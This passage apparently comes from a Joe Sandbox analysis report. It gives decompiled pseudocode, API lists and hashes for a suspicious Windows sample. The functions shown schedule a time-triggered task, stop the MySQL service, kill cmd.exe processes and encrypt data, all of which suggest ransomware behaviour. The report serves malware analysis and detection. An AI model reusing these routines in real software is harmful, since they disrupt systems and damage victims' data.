0x0040dc2d
0x0040dc38
0x0040dc42
0x0040dc49
0x0040dc4d
0x0040dc55
0x0040dc5c
0x0040dc5f
0x0040dc66
0x0040dc71
0x0040dc74
0x0040dc83
0x0040dc85
0x0040dc8f
0x0040dc92
0x0040dc92
0x0040dc9c
0x0040dca1
0x0040dca6
0x0040dcac
0x0040dcb6

APIs

CoInitialize.OLE32(00000000), ref: 0040DAEB
CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
lstrcpyW.KERNEL32 ref: 0040DBD6
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
_memset.LIBCMT ref: 0040DC38
CoUninitialize.OLE32 ref: 0040DC92

Strings

--Task, xrefs: 0040DBB5
Time Trigger Task, xrefs: 0040DB24, 0040DB34, 0040DB52
Comment, xrefs: 0040DBFF

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
String ID: --Task$Comment$Time Trigger Task
API String ID: 330603062-1376107329
Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411A10() {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t9;
				int _t10;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t23;
				void* _t26;

				_t9 = OpenSCManagerW(0, 0, 1);
				_t19 = _t9;
				if(_t19 != 0) {
					_t10 = OpenServiceW(_t19, L"MYSQL", 0x20);
					_t26 = _t10;
					if(_t26 == 0) {
						L12:
						return _t10;
					}
					if(ControlService(_t26, 1,  &_v32) == 0) {
						L11:
						_t10 = CloseServiceHandle(_t19);
						goto L12;
					}
					if(QueryServiceStatus(_t26,  &_v32) == 0 || _v28 == 1) {
						L10:
						CloseServiceHandle(_t26);
						goto L11;
					} else {
						_t16 = _v12;
						do {
							_t23 = _t16;
							Sleep(_v8);
							if(QueryServiceStatus(_t26,  &_v32) == 0) {
								break;
							}
							_t16 = _v12;
						} while (_t16 >= _t23 && _v28 != 1);
						goto L10;
					}
				}
				return _t9;
			}

0x00411a1d
0x00411a23
0x00411a27
0x00411a32
0x00411a38
0x00411a3c
0x00411aa4
0x00000000
0x00411aa4
0x00411a54
0x00411aa0
0x00411aa1
0x00000000
0x00411aa3
0x00411a63
0x00411a9d
0x00411a9e
0x00000000
0x00411a6b
0x00411a6b
0x00411a70
0x00411a73
0x00411a75
0x00411a88
0x00000000
0x00000000
0x00411a8a
0x00411a8d
0x00000000
0x00411a97
0x00411a63
0x00411aa9

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
Sleep.KERNEL32(?), ref: 00411A75
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1

Strings

MYSQL, xrefs: 00411A2C

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
String ID: MYSQL
API String ID: 2359367111-1651825290
Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0044F26C(void* __eflags, char _a4) {
				char _v16;
				char _v24;
				char _v44;
				intOrPtr _v52;
				char _v76;
				char _v84;
				char _v104;
				void* _t50;
				void* _t51;

				_t51 = _t50 - 0xc;
				E00430CFC( &_v16,  &_a4);
				_v16 = 0x4d6560;
				E00430ECA( &_v16, 0x508238);
				asm("int3");
				_push(_t50);
				E00430CFC( &_v44,  &_v24);
				_v44 = 0x4d6578;
				E00430ECA( &_v44, 0x508274);
				asm("int3");
				_push(_t51);
				E0044EF74( &_v76, _v52);
				E00430ECA( &_v76, 0x508320);
				asm("int3");
				_push(_t51 - 0xc);
				E00430CFC( &_v104,  &_v84);
				_v104 = 0x4d656c;
				E00430ECA( &_v104, 0x5082cc);
				asm("int3");
				return "bad function call";
			}

0x0044f26f
0x0044f27f
0x0044f28c
0x0044f294
0x0044f299
0x0044f29a
0x0044f2ad
0x0044f2ba
0x0044f2c2
0x0044f2c7
0x0044f2c8
0x0044f2d4
0x0044f2e2
0x0044f2e7
0x0044f2e8
0x0044f2fb
0x0044f308
0x0044f310
0x0044f315
0x0044f31b

APIs

std::exception::exception.LIBCMT ref: 0044F27F

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F294

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

std::exception::exception.LIBCMT ref: 0044F2AD
__CxxThrowException@8.LIBCMT ref: 0044F2C2
std::regex_error::regex_error.LIBCPMT ref: 0044F2D4

Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E

__CxxThrowException@8.LIBCMT ref: 0044F2E2
std::exception::exception.LIBCMT ref: 0044F2FB
__CxxThrowException@8.LIBCMT ref: 0044F310

Strings

bad function call, xrefs: 0044F316

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52
processCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00412440() {
				char _v524;
				long _v552;
				void* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t8;
				int _t11;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;

				_t18 = CreateToolhelp32Snapshot(0xf, 0);
				_v560 = 0x22c;
				_push( &_v560);
				_t8 = Process32FirstW(_t18);
				_t17 = CloseHandle;
				if(_t8 == 0) {
					L7:
					return CloseHandle(_t18);
				}
				_push(_t19);
				do {
					_t11 = E00420235(_t17, _t18, _t19,  &_v524, L"cmd.exe");
					_t21 = _t21 + 8;
					if(_t11 == 0) {
						_t19 = OpenProcess(1, _t11, _v552);
						if(_t19 != 0) {
							TerminateProcess(_t19, 9);
							CloseHandle(_t19);
						}
					}
				} while (Process32NextW(_t18,  &_v560) != 0);
				goto L7;
			}

0x00412455
0x00412457
0x00412467
0x00412469
0x0041246f
0x00412477
0x004124cc
0x004124d4
0x004124d4
0x00412479
0x00412480
0x0041248c
0x00412491
0x00412496
0x004124a7
0x004124ab
0x004124b0
0x004124b7
0x004124b7
0x004124ab
0x004124c7
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
CloseHandle.KERNEL32(00000000), ref: 004124B7
Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
CloseHandle.KERNEL32(00000000), ref: 004124CD

Strings

cmd.exe, xrefs: 00412486

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: cmd.exe
API String ID: 2696918072-723907552
Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040F310(void* __edi, void* __esi, char _a4, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v56;
				intOrPtr _v60;
				signed int _v64;
				short _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v104;
				void* __ebx;
				void* __ebp;
				_Unknown_base(*)()* _t147;
				void* _t169;
				void* _t173;
				void* _t177;
				void* _t195;
				void* _t203;
				struct HINSTANCE__* _t221;
				signed int _t222;
				void* _t233;
				void* _t235;
				signed int _t238;
				short _t260;
				char _t261;
				intOrPtr _t266;
				void* _t267;
				void* _t268;
				void* _t269;

				_push(0xffffffff);
				_push(0x4caa98);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t266;
				_t267 = _t266 - 0x58;
				_v8 = 0;
				_t221 = LoadLibraryW(L"Shell32.dll");
				if(_t221 != 0) {
					_t147 = GetProcAddress(_t221, "SHGetFolderPathW");
					_t259 = _t147;
					E00413A90(_t221,  &_v32, __edi, 0x400);
					_v8 = 1;
					_t254 = _v32;
					 *_t147(0, 0x28, 0, 0, _v32, __edi, __esi);
					_push(_v20);
					_v36 = 7;
					_v40 = 0;
					_v56 = 0;
					E00418400( &_v56, _v32, _v28);
					_v8 = 2;
					_push(1);
					_v84 = 7;
					_v88 = 0;
					_v104 = 0;
					E00415C10(_t221,  &_v104, _t254, _t147, "\\");
					_v8 = 3;
					_push(1);
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					E00415C10(_t221,  &_v80, _t254, _t147, "/");
					_v8 = 4;
					E0040F2B0( &_v56,  &_v80,  &_v104);
					_t268 = _t267 + 4;
					if(_v60 >= 8) {
						L00422587(_v80);
						_t268 = _t268 + 4;
					}
					_v8 = 2;
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					if(_v84 >= 8) {
						L00422587(_v104);
						_t268 = _t268 + 4;
					}
					_push(1);
					_v84 = 7;
					_v88 = 0;
					_v104 = 0;
					E00415C10(_t221,  &_v104, _t254, _t259, "\\");
					_v8 = 5;
					_push(1);
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					E00415C10(_t221,  &_v80, _t254, _t259, "/");
					_v8 = 6;
					E0040F2B0( &_a4,  &_v80,  &_v104);
					_t269 = _t268 + 4;
					if(_v60 >= 8) {
						L00422587(_v80);
						_t269 = _t269 + 4;
					}
					_v8 = 2;
					_v60 = 7;
					_v64 = 0;
					_v80 = 0;
					if(_v84 >= 8) {
						L00422587(_v104);
						_t269 = _t269 + 4;
					}
					_t260 = _v56;
					_t167 =  >=  ? _t260 :  &_v56;
					_t233 =  >=  ? _t260 :  &_v56;
					_v20 =  >=  ? _t260 :  &_v56;
					_t250 =  >=  ? _t260 :  &_v56;
					_t169 = _t233 + _v40 * 2;
					__eflags = ( >=  ? _t260 :  &_v56) - _t169;
					if(( >=  ? _t260 :  &_v56) != _t169) {
						_push(_t233);
						E00418380( &_v20, _t250, _t169, _v20);
						_t269 = _t269 + 0xc;
					}
					_t261 = _a4;
					_t171 =  >=  ? _t261 :  &_a4;
					_t235 =  >=  ? _t261 :  &_a4;
					_v20 =  >=  ? _t261 :  &_a4;
					_t252 =  >=  ? _t261 :  &_a4;
					_t173 = _t235 + _a20 * 2;
					__eflags = ( >=  ? _t261 :  &_a4) - _t173;
					if(( >=  ? _t261 :  &_a4) != _t173) {
						_push(_t235);
						E00418380( &_v20, _t252, _t173, _v20);
						_t269 = _t269 + 0xc;
					}
					_t267 = _t269 - 8;
					_v20 = 0x5c;
					if(E00414D40( &_v56,  &_v20) != 0xffffffff) {
						_t177 = E00413520( &_v56,  &_v104, 0, _t175);
						_t262 = _t177;
						if( &_v56 != _t177) {
							if(_v36 >= 8) {
								L00422587(_v56);
								_t267 = _t267 + 4;
							}
							_v36 = 7;
							_v40 = 0;
							_v56 = 0;
							E004145A0( &_v56, _t262);
						}
						if(_v84 >= 8) {
							L00422587(_v104);
							_t267 = _t267 + 4;
						}
						_t238 = _v40;
						_t180 =  >=  ? _v56 :  &_v56;
						if( *((short*)(( >=  ? _v56 :  &_v56) + _t238 * 2 - 2)) == 0x5c) {
							_t97 = _t238 - 1; // -1
							_t203 = E00413520( &_v56,  &_v104, 0, _t97);
							_t265 = _t203;
							if( &_v56 != _t203) {
								if(_v36 >= 8) {
									L00422587(_v56);
									_t267 = _t267 + 4;
								}
								_v36 = 7;
								_v40 = 0;
								_v56 = 0;
								E004145A0( &_v56, _t265);
							}
							if(_v84 >= 8) {
								L00422587(_v104);
								_t267 = _t267 + 4;
							}
						}
						_t239 = _a20;
						_t182 =  >=  ? _a4 :  &_a4;
						if( *((short*)(( >=  ? _a4 :  &_a4) + _a20 * 2 - 2)) == 0x5c) {
							_t239 =  &_a4;
							_t195 = E00413520( &_a4,  &_v104, 0,  &_a4 - 1);
							_t264 = _t195;
							if( &_a4 != _t195) {
								if(_a24 >= 8) {
									L00422587(_a4);
									_t267 = _t267 + 4;
								}
								_a24 = 7;
								_t239 =  &_a4;
								_a20 = 0;
								_a4 = 0;
								E004145A0( &_a4, _t264);
							}
							if(_v84 >= 8) {
								L00422587(_v104);
								_t267 = _t267 + 4;
							}
						}
						FreeLibrary(_t221);
						_t185 =  >=  ? _a4 :  &_a4;
						_t222 = _t221 & 0xffffff00 | E00417F00( &_v56, _t239, _v40,  >=  ? _a4 :  &_a4, _a20) == 0x00000000;
					} else {
						FreeLibrary(_t221);
						_t222 = 0;
					}
					if(_v36 >= 8) {
						L00422587(_v56);
						_t267 = _t267 + 4;
					}
					_v36 = 7;
					_v56 = 0;
					_t188 = _v32;
					_v40 = 0;
					if(_v32 != 0) {
						L00422587(_t188);
						_t267 = _t267 + 4;
					}
					goto L41;
				} else {
					_t222 = 0;
					L41:
					if(_a24 >= 8) {
						L00422587(_a4);
					}
					 *[fs:0x0] = _v16;
					return _t222;
				}
			}

0x0040f313
0x0040f315
0x0040f320
0x0040f321
0x0040f328
0x0040f331
0x0040f33e
0x0040f342
0x0040f353
0x0040f361
0x0040f363
0x0040f368
0x0040f36c
0x0040f378
0x0040f37a
0x0040f37f
0x0040f38c
0x0040f394
0x0040f398
0x0040f39d
0x0040f3a4
0x0040f3a8
0x0040f3b4
0x0040f3bb
0x0040f3bf
0x0040f3c4
0x0040f3cb
0x0040f3cf
0x0040f3db
0x0040f3e2
0x0040f3e6
0x0040f3ee
0x0040f3f9
0x0040f3fe
0x0040f405
0x0040f40a
0x0040f40f
0x0040f40f
0x0040f414
0x0040f41c
0x0040f423
0x0040f42a
0x0040f42e
0x0040f433
0x0040f438
0x0040f438
0x0040f43b
0x0040f43f
0x0040f44e
0x0040f455
0x0040f459
0x0040f45e
0x0040f465
0x0040f469
0x0040f475
0x0040f47c
0x0040f480
0x0040f488
0x0040f493
0x0040f498
0x0040f49f
0x0040f4a4
0x0040f4a9
0x0040f4a9
0x0040f4ae
0x0040f4b6
0x0040f4bd
0x0040f4c4
0x0040f4c8
0x0040f4cd
0x0040f4d2
0x0040f4d2
0x0040f4db
0x0040f4e7
0x0040f4ea
0x0040f4ed
0x0040f4f0
0x0040f4f6
0x0040f4f9
0x0040f4fb
0x0040f4fd
0x0040f505
0x0040f50a
0x0040f50a
0x0040f513
0x0040f51f
0x0040f522
0x0040f525
0x0040f528
0x0040f52e
0x0040f531
0x0040f533
0x0040f535
0x0040f53d
0x0040f542
0x0040f542
0x0040f545
0x0040f548
0x0040f55e
0x0040f578
0x0040f57d
0x0040f584
0x0040f58a
0x0040f58f
0x0040f594
0x0040f594
0x0040f599
0x0040f5a4
0x0040f5ab
0x0040f5af
0x0040f5af
0x0040f5b8
0x0040f5bd
0x0040f5c2
0x0040f5c2
0x0040f5cc
0x0040f5cf
0x0040f5d9
0x0040f5db
0x0040f5e8
0x0040f5ed
0x0040f5f4
0x0040f5fa
0x0040f5ff
0x0040f604
0x0040f604
0x0040f609
0x0040f614
0x0040f61b
0x0040f61f
0x0040f61f
0x0040f628
0x0040f62d
0x0040f632
0x0040f632
0x0040f628
0x0040f63c
0x0040f63f
0x0040f649
0x0040f655
0x0040f658
0x0040f65d
0x0040f664
0x0040f66a
0x0040f66f
0x0040f674
0x0040f674
0x0040f679
0x0040f681
0x0040f684
0x0040f68b
0x0040f68f
0x0040f68f
0x0040f698
0x0040f69d
0x0040f6a2
0x0040f6a2
0x0040f698
0x0040f6a6
0x0040f6b6
0x0040f6c9
0x0040f560
0x0040f561
0x0040f567
0x0040f567
0x0040f6d2
0x0040f6d7
0x0040f6dc
0x0040f6dc
0x0040f6e1
0x0040f6e8
0x0040f6ec
0x0040f6ef
0x0040f6f8
0x0040f6fb
0x0040f700
0x0040f700
0x00000000
0x0040f344
0x0040f344
0x0040f703
0x0040f707
0x0040f70c
0x0040f711
0x0040f71a
0x0040f724
0x0040f724

APIs

LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353

Strings

SHGetFolderPathW, xrefs: 0040F34D
Shell32.dll, xrefs: 0040F32C
\, xrefs: 0040F548

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetFolderPathW$Shell32.dll$\
API String ID: 2574300362-2555811374
Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040CBA0(intOrPtr* __ecx, void* __eflags, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v1124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t127;
				intOrPtr _t129;
				void* _t150;
				void* _t172;
				void* _t173;
				void* _t176;
				void* _t178;
				intOrPtr _t179;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t185;
				void* _t189;
				void* _t191;

				_push(0xffffffff);
				_push(0x4ca818);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t179;
				_push(_t150);
				_push(_t172);
				_v100 = __ecx;
				_push(0xffffffff);
				_v8 = 1;
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				E00413FF0(_t150,  &_v92,  &_a28, 0);
				_v8 = 2;
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, "\n");
				_v8 = 3;
				_push(3);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "\\\\n");
				_v8 = 4;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t181 = _t179 - 0x458 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t181 = _t181 + 4;
				}
				_v8 = 2;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t181 = _t181 + 4;
				}
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, " ");
				_v8 = 5;
				_push(6);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "&#160;");
				_v8 = 6;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t182 = _t181 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t182 = _t182 + 4;
				}
				_v8 = 2;
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t182 = _t182 + 4;
				}
				_push(1);
				_v48 = 0xf;
				_v52 = 0;
				_v68 = 0;
				E004156D0(_t150,  &_v68, _t172, "/");
				_v8 = 7;
				_push(2);
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				E004156D0(_t150,  &_v44, _t172, "\\/");
				_v8 = 8;
				_t171 =  &_v44;
				E0040F250( &_v92,  &_v44,  &_v68);
				_t183 = _t182 + 4;
				if(_v24 >= 0x10) {
					L00422587(_v44);
					_t183 = _t183 + 4;
				}
				_v24 = 0xf;
				_v28 = 0;
				_v44 = 0;
				if(_v48 >= 0x10) {
					L00422587(_v68);
					_t183 = _t183 + 4;
				}
				_v20 = E00451D30();
				E0044F960(_t150, _t171, E00452510());
				_t120 =  >=  ? _v92 :  &_v92;
				_t151 = E004524A0(_t178,  >=  ? _v92 :  &_v92, _v76);
				E00452ED0(_t121,  &_v20, 0, 0);
				_t185 = _t183 + 0x1c;
				if(E00450960(_t151, _t171, _v72 - 0x10) == 0) {
					_t176 = E00420C62(_t151, _t171, _t172, E004527A0(_t171, __eflags, _v20));
					_t127 = E00420C62(_t151, _t171, _t172, 0x82);
					__eflags = _a24 - 0x10;
					_t173 = _t127;
					_t165 =  >=  ? _a4 :  &_a4;
					_t129 = _a20 + 1;
					_push(4);
					_push(_v20);
					_push(_t176);
					_push( >=  ? _a4 :  &_a4);
					E004525F0(_t129);
					_t189 = _t185 + 0x20;
					_v96 = _t129;
					__eflags = _t129 - 0xffffffff;
					if(_t129 != 0xffffffff) {
						E0044F5E0(_t151);
						E00451A60(_t171, _t178, _v20);
						_t191 = _t189 + 8;
						 *_v100 = _v96;
					} else {
						E00451FB0(_t151, _t173);
						E00450670(E00450960(_t151, _t171, __eflags), _t173);
						_push(_t173);
						_push("Error encrypting message: %s\n");
						_push(E00420E4D() + 0x40);
						E00422408(_t151, _t173, _t176, __eflags);
						_t191 = _t189 + 0x14;
						_t176 = 0;
					}
				} else {
					E00450670(_t124,  &_v1124);
					_t191 = _t185 + 8;
					_t176 = 0;
				}
				if(_v72 >= 0x10) {
					L00422587(_v92);
					_t191 = _t191 + 4;
				}
				_v72 = 0xf;
				_v76 = 0;
				_v92 = 0;
				if(_a24 >= 0x10) {
					L00422587(_a4);
					_t191 = _t191 + 4;
				}
				_a24 = 0xf;
				_a20 = 0;
				_a4 = 0;
				if(_a48 >= 0x10) {
					L00422587(_a28);
				}
				 *[fs:0x0] = _v16;
				return _t176;
			}

0x0040cba3
0x0040cba5
0x0040cbb0
0x0040cbb1
0x0040cbbe
0x0040cbc0
0x0040cbc1
0x0040cbc4
0x0040cbc6
0x0040cbd6
0x0040cbdd
0x0040cbe4
0x0040cbe8
0x0040cbed
0x0040cbf4
0x0040cbfb
0x0040cc02
0x0040cc09
0x0040cc0d
0x0040cc12
0x0040cc19
0x0040cc20
0x0040cc27
0x0040cc2e
0x0040cc32
0x0040cc3a
0x0040cc45
0x0040cc4a
0x0040cc51
0x0040cc56
0x0040cc5b
0x0040cc5b
0x0040cc5e
0x0040cc66
0x0040cc6d
0x0040cc74
0x0040cc78
0x0040cc7d
0x0040cc82
0x0040cc82
0x0040cc85
0x0040cc8f
0x0040cc96
0x0040cc9d
0x0040cca1
0x0040cca6
0x0040ccad
0x0040ccb4
0x0040ccbb
0x0040ccc2
0x0040ccc6
0x0040ccce
0x0040ccd9
0x0040ccde
0x0040cce5
0x0040ccea
0x0040ccef
0x0040ccef
0x0040ccf2
0x0040ccfa
0x0040cd01
0x0040cd08
0x0040cd0c
0x0040cd11
0x0040cd16
0x0040cd16
0x0040cd19
0x0040cd23
0x0040cd2a
0x0040cd31
0x0040cd35
0x0040cd3a
0x0040cd41
0x0040cd48
0x0040cd4f
0x0040cd56
0x0040cd5a
0x0040cd62
0x0040cd67
0x0040cd6d
0x0040cd72
0x0040cd79
0x0040cd7e
0x0040cd83
0x0040cd83
0x0040cd8a
0x0040cd91
0x0040cd98
0x0040cd9c
0x0040cda1
0x0040cda6
0x0040cda6
0x0040cdae
0x0040cdb7
0x0040cdc6
0x0040cdd5
0x0040cdde
0x0040cde3
0x0040cded
0x0040ce1a
0x0040ce21
0x0040ce2c
0x0040ce30
0x0040ce35
0x0040ce39
0x0040ce3a
0x0040ce3c
0x0040ce3f
0x0040ce40
0x0040ce42
0x0040ce47
0x0040ce4a
0x0040ce4d
0x0040ce50
0x0040ce82
0x0040ce8d
0x0040ce95
0x0040ce9b
0x0040ce52
0x0040ce52
0x0040ce5e
0x0040ce66
0x0040ce67
0x0040ce74
0x0040ce75
0x0040ce7a
0x0040ce7d
0x0040ce7d
0x0040cdef
0x0040cdf7
0x0040cdfc
0x0040cdff
0x0040cdff
0x0040cea1
0x0040cea6
0x0040ceab
0x0040ceab
0x0040ceb2
0x0040ceb9
0x0040cec0
0x0040cec4
0x0040cec9
0x0040cece
0x0040cece
0x0040ced5
0x0040cedc
0x0040cee3
0x0040cee7
0x0040ceec
0x0040cef1
0x0040cefb
0x0040cf06

APIs

__except_handler4.MSVCRT ref: 0040CDDE
_malloc.LIBCMT ref: 0040CE12
_malloc.LIBCMT ref: 0040CE21
_fprintf.LIBCMT ref: 0040CE75

Strings

 , xrefs: 0040CCAF
\\n, xrefs: 0040CC1B
Error encrypting message: %s, xrefs: 0040CE67

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
